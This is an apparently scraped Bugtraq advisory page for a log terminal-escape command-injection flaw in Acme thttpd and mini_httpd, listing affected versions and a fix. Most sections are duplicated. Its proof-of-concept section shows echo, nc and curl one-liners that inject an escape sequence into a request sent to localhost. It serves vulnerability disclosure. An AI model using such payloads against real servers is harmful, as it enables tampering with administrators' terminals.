Acme thttpd and mini_httpd Terminal Escape Sequence in Logs Command Injection Vulnerability
BID:37714
Info
Acme thttpd and mini_httpd Terminal Escape Sequence in Logs Command Injection Vulnerability
| Bugtraq ID: | 37714 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-4490 CVE-2009-4491 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 11 2010 12:00AM |
| Updated: | Jun 25 2012 07:50AM |
| Credit: | Giovanni 'evilaliv3' Pellerano, Alessandro 'jekil' Tanasi, and Francesco 'ascii' Ongaro |
| Vulnerable: |
Gentoo Linux Acme thttpd 2.24 Acme thttpd 2.23 b1 Acme thttpd 2.22 Acme thttpd 2.21 b Acme thttpd 2.21 Acme thttpd 2.20 c Acme thttpd 2.20 b Acme thttpd 2.20 Acme thttpd 2.19 Acme thttpd 2.18 Acme thttpd 2.17 Acme thttpd 2.16 Acme thttpd 2.15 Acme thttpd 2.14 Acme thttpd 2.13 Acme thttpd 2.12 Acme thttpd 2.11 Acme thttpd 2.10 Acme thttpd 2.0.9 Acme thttpd 2.0.8 Acme thttpd 2.0.7 beta 0.4 Acme thttpd 2.0.7 Acme thttpd 2.0.6 Acme thttpd 2.0.5 Acme thttpd 2.0.4 Acme thttpd 2.0.3 Acme thttpd 2.0.2 Acme thttpd 2.0.1 Acme thttpd 2.0 Acme thttpd 1.95 Acme thttpd 1.90 a Acme thttpd 1.0 .x Acme thttpd 1.0 Acme thttpd 2.25 b Acme thttpd 2.1x Acme mini_httpd 1.18 Acme mini_httpd 1.16 Acme mini_httpd 1.15 c Acme mini_httpd 1.15 b Acme mini_httpd 1.15 Acme mini_httpd 1.14 Acme mini_httpd 1.13 Acme mini_httpd 1.12 Acme mini_httpd 1.11 Acme mini_httpd 1.10 0 Acme mini_httpd 1.0 1 Acme mini_httpd 1.0 0 Acme mini_httpd 1.19 |
| Not Vulnerable: | |
Discussion
Acme thttpd and mini_httpd Terminal Escape Sequence in Logs Command Injection Vulnerability
Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles.
Attackers can exploit this issue to execute arbitrary commands in a terminal.
This issue affects thttpd 2.25b and mini_httpd 1.19; other versions may also be affected.
Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles.
Attackers can exploit this issue to execute arbitrary commands in a terminal.
This issue affects thttpd 2.25b and mini_httpd 1.19; other versions may also be affected.
Exploit / POC
Acme thttpd and mini_httpd Terminal Escape Sequence in Logs Command Injection Vulnerability
Attackers can exploit this issue with readily available tools.
The following examples are available:
For thttpd:
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
For mini_httpd:
curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
Attackers can exploit this issue with readily available tools.
The following examples are available:
For thttpd:
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
For mini_httpd:
curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
Solution / Fix
Acme thttpd and mini_httpd Terminal Escape Sequence in Logs Command Injection Vulnerability
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
Acme thttpd and mini_httpd Terminal Escape Sequence in Logs Command Injection Vulnerability
References:
References: